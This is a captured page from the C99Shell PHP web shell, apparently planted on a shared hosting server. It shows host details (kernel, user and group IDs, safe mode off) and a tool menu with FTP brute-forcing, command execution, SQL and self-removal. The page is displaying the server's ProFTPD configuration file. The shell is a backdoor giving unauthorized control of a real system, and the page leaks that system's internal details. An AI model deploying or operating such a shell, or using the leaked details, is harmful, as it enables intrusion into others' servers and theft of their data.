!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/etc/proftpd/   drwxr-xr-x
Free 667.96 GB of 879.6 GB (75.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     proftpd.conf (1.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
# dh2.0 /etc/proftpd.conf template
# $Id: proftpd.conf.tp,v 1.30 2008-10-07 22:53:07 anthony Exp $

ServerName                      "DreamHost FTP"
ServerType                      standalone
DefaultServer                   on
DeferWelcome                    off
Port                            21

ServerIdent on "DreamHost FTP Server"

TimeoutIdle			7200
TimeoutLogin			600
TimeoutNoTransfer		3600
TimeoutStalled			7200
# This should already be the default.  Just making damn sure.
TimeoutSession			0

TimeoutLinger			120

TimesGMT			off
# TimesGMT seems to have stopped working so...
SetEnv TZ           US/Pacific

# ProFTPD's module for performing lookups of authenticated user IDs
<IfModule mod_ident.c>
	IdentLookups off
</IfModule>

PersistentPasswd		on
RequireValidShell		on
ExtendedLog 			/var/log/ftp.log

# disabling the xferlog for now - natem
TransferLog                     none

# why was this ever off? - dallas
UseFtpUsers			on

# This is supposed to not work well with NFS and didn't even used to be enabled in the package before, but it seems to fix the recent problems?  - JeremyH
UseSendfile			on
MaxClientsPerUser 15
MaxClientsPerHost 35
# This limits UNAUTHENTICATED connections only.  After they authenticate, they're limited by one of the MaxClients* values above
MaxConnectionsPerHost 10
MaxHostsPerUser 7



# Should allow forwarded ssh connections to work.
AllowForeignAddress		on

# Let's see if this helps
UseReverseDNS			off

# allow resume
#DefaultTransferMode		binary
AllowRetrieveRestart		on
AllowStoreRestart		on

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# Set the user and group that the server normally runs at.
User                            nobody
Group                           nogroup

# Normally, we want files to be overwriteable.
<Directory />
  AllowOverwrite                on
</Directory>


DefaultRoot ~ !dreamers

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0154 ]--